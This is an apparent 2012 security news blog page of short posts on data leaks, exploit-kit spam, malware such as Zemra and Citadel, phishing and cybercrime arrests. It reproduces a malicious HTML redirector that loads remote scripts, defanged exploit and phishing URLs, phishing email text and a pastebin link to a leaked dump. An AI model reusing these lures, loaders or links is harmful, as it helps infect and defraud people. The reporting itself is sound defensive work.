Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Database Leaked
Breaking News Database Leaked

Trendmicro & Sykes Hacked by @OfficialComrade

One of the popular antivirus TrendMicro website has been hacked by @OfficialComrade (.c0mrade) and dumped a huge load of emails.

The attack which also effects Sykes, who which trendmicro appears to run support services through, has been effected as well. The attack was announced on .c0mrades twitter with the following message.

"Trendmicro & Sykes is a Global Business and Antivirus suite, we've targeted them due to their constant lash of pseudo-security." Hacker said in the pastebin.

 "Owning Trendmicro & Sykes wasn't a priority of ours. However, if it was, they would have dug their burial site sometime ago."

" Sliding towards more recent events, today is June 30th, 2012 and absurdly, I'm monotonous. Why? Because Nowadays, it seems as if everybody is widely concerned with notoriety. New 'groups' are emerging, more 'pigments' are being infiltrated by demented teenagers so they could feel better about themselves, etc. My demands are written on the palm of my hands; stop. You're a nuisance. Sliding back to the whole Trendmicro & Sykes testament, we don't want to be compete pricks, so for the companies' sake, we'll take baby steps on this one. We'll release every inch of their Email Database; Inbox, Drafts, Sent Items, Deleted Items, Attachments, and all content in all folders. You'll need a .dbx file viewer to see the content."

http://pastebin.com/EVSAXjz1
Read more »
Spam Report
BlackHole Exploit Spam Report

Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits


Researchers at MX Lab , has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.


The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′; The above page contains an obfuscated javascript.

  After de-obfuscating the javascript, i found there is Blackhole exploit pack that try to exploit one of the vulnerable software(flash, pdf and other exploits). At the bottom of the page, you can find the applet code that try to exploit the Java Atomic reference vulerability.

Read more »
Malware Report
Malware Report

Zemra ,a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec Researchers. This threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that is has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and act as the gateway to record the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client;and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.

Read more »
Malware Report
Malware Report

New version of Citadel Trojan prevents Virtual Machine Analysis


Security Researchers from S21sec, has spotted two major changes in the latest version of Citadel Trojan. The two major changes 'Anti-emulator' and 'Encryption change' try to make malware analysts' life harder.

The anti-emulator: When it starts, a built-in detective checks if it is running in a virtual machine or in sandboxed environment (CWSandbox, VMware, Virtualbox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technology is very tricky.

According to researchers, It simply scans through the resources of the currently running processes and looks for specific patterns for instance inside the "CompanyName" field, such as 'vmware','sandbox','virtualbox','geswall'.

While running in the VM, The Trojan creates a fake domain name and attempts to connect to it. This strategy should fool the researchers into believing that the (C&C) command and control server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 is slightly different compared to previous versions, an internal hash being added to the algorithm.
Read more »
Cyber Crime
Cyber Crime

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil,had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University’s website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.
Read more »
Spam Report
Spam Report

‘Confirm PayPal account' notifications lead to phishing sites


An extremely legitimately-looking PayPal themed emails has been hitting inboxes in the last few days, trying totrick users into entering their accounting data on the fraudulent web site linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," The fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes those users to a faithfully reproduced PayPal phishing site:

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.
Read more »
LulzSec
Breaking News LulzSec

Panda Security site Hacked and database compromised by @LulzSecMx


A Hacker called as @LulzSecMx, claimed to have unauthorized access to one of the biggest Anti-virus providers, 'Panda Security' website and leaked the database in pastebin. The attack announced via @LulzSecMx .

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" Hacker said.

 "We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email address, encrypted passwords and some other confidential data compromised from the PandaSecurity.com website.
Read more »
Breaking News
Anonymous Hackers Breaking News

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, The finance ministry’s website was hacked with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.
Read more »
Software Release
Malware Analyzers Software Release

Hook Analyser 2.0 released -reversing application and analysing malwares

Hook analyser is a hook tool which could be potentially helpful in reversing application and analysing malwares.

Changelog:

  • Static analysis functionality has got improved significantly.
  • Nice fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have improved.
  • No more annoying browser pop-ups (previous releases had some).
Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip
Read more »
Malware Report
BlackHole Exploit Malware Report

Blackhole Exploit Kit upgraded to generate pseudo-random domains

Blackhole Exploit Kit is one of the famous Exploit Kit which is being used by Cyber Criminals for infecting innocent users through Drive-by-download.  It delivers different exploit including Java, Adobe Flash Player, Adobe Reader, Windows Help Center, and other applications.

Although this approach has generally been very successful for malware authors, it has had one weakness. If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.

To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains ,based on the date and other information, and then creates an iframe pointing to the generated domain.

After de-Obfuscating the javascript in the compromised pages, symantec researchers found a code that pseudo-random domains.

This code uses the setTimeout() DOM function to run a particular piece of code (the anonymous function at the bottom of the code) after half a second. This function calls the following:

  • generatePseudoRandomString() function, with a timestamp
  • 16, the desired length of the domain name
  • ru, the top-level domain name to use

The code then creates a hidden iframe, using the previously-generated domain as the source.

Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed.

Running this code in isolation, it seems that the pseudo-random domain is based on a number which is in turn based on an initial seed value, the current month and the day of the current month. When running the code at the time of writing, it returned:

lfbovcaitd[REMOVED].ru

By changing the date passed to the function we can determine domains that will be used in future. All domains up to 7 August of this year have been registered and all currently resolve to the same IP address. The domains, all recently registered, use private registration, such as details of the registrant not published in WHOIS.
Read more »
Security News
Security News

FBI two-year cybercrime sting leads to 24 arrests


The FBI orchestrated a two-year cybercrime sting that resulted in 24 arrests, with some alleged hackers facing more than 20 years in prison for allegedly profiting from stolen information such as credit card and bank account numbers, law enforcement authorities announced today.

The U.S attorney's office in Manhattan and the FBI announced the arrests and provided details of the sting operation, which involved FBI agents posing as hackers while the bureau set up a fake "carding" forum, according to the press release (see the full release below).

Carding is the term for crimes associated with exploiting stolen personal information for profit. The forums helped "carders" communicate and, in some cases, find mailing addresses -- usually empty apartments or houses -- for products purchased with stolen credit-card data.

While the sting netted 24 arrests across eight countries, authorities only shared the charges of 12 alleged hackers. These individuals were charged with several counts of fraud, including selling personal data, using stolen information to purchase or obtain products, and selling tools to aid hackers in stealing information.

The FBI claims it prevented 400,000 potential cybercrimes via this operation.

via cnet
Read more »
Subscribe to: Comments (Atom)